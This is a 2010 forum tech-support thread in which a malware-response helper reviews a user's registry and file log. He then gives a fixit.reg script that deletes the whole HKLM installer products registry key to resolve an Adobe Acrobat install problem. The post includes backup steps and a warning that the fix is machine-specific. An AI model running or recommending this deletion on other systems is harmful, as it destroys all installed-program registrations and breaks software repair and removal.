[HKEY_LOCAL_MACHINE\software\classes\installer\products\6E8A266FCD4F2A1409E1C8110F44DBCE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\7475C687330100005BE8000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\8767879E33010000E876000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\8CAF48E7815C9F048970475503D1D652]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\952D7EE5731D8344A9F5244F23CE4012]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\B6ED15411EBA26F4EBA93B361A57882A]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\C80D5F2B97E7DCF4AA4F75DA53FF6010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\C9AAD94C8AB5A95428445EB796FDF040]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\CFD2C1F142D260E3CB8B271543DA9F98]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D20352A90C039D93DBF6126ECE614057]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D47ABDE8686099C4FBDD8F4976E8B593]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D55AEDAA438CBCB4893AB4D8C1814FEE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\DC3BF90CC0D3D2F398A9A6D1762F70F3]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\DDA39468D428E8B4DB27C8D5DC5CA217]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\E0CF391F81E9CF049A4705A9B1DD42A0]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\F65865963B6B0EB4ABB0F894B53E0233]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\FA7D934F3F30E8F4EA4C75B1EF79C716]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\FD563AF386D2DE54F838C8A8336E1534]


========== filefind ==========

Searching for "acropro.msi"
E:\Program Files\Adobe\Adobe Acrobat 7.0\Setup Files\AcroPro\ENU\AcroPro.msi --a--- 3888640 bytes [09:12 02/02/2010] [09:12 02/02/2010] 39F424137795ED0AC75122AB49C346F4

-=End Of File=-


'sleep gives you cancer...everybody knows that'

#15 m0le
Malware Response Team, 34,527 posts, Location: London, UK

Posted 08 August 2010 - 01:21 PM

Adobe's installers are found in that registry path. Removing the subkey will stop the problem...or should.

Backup Your Registry with ERUNT
  • Please use the following link and scroll down to ERUNT and download it.
    http://aumha.org/freeware/freeware.php
  • For version with the Installer:
    Use the setup program to install ERUNT on your computer
  • For the zipped version:
    Unzip all the files into a folder of your choice.
Click Erunt.exe to backup your registry to the folder of your choice.

Note: to restore your registry, go to the folder and start ERDNT.exe

Open Notepad. Please copy the contents of the code box below. To do this, highlight the contents of the box and right click on it. Paste this into the open Notepad. Save it to your desktop (click File, Save As) as fixit.reg. In the same open Notepad, in the line below, select Any for File Type.

CODE
REGEDIT4

[-HKEY_LOCAL_MACHINE\software\classes\installer\products]


NOTICE: This file was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Locate fixit.reg on your Desktop and double-click on it.
You will receive a prompt similar to: "Do you wish to merge the information into the registry?".
Answer "Yes" and wait for a message to appear similar to "Merged Successfully".

Please reply back letting me know if it merged correctly.
m0le is a proud member of UNITE



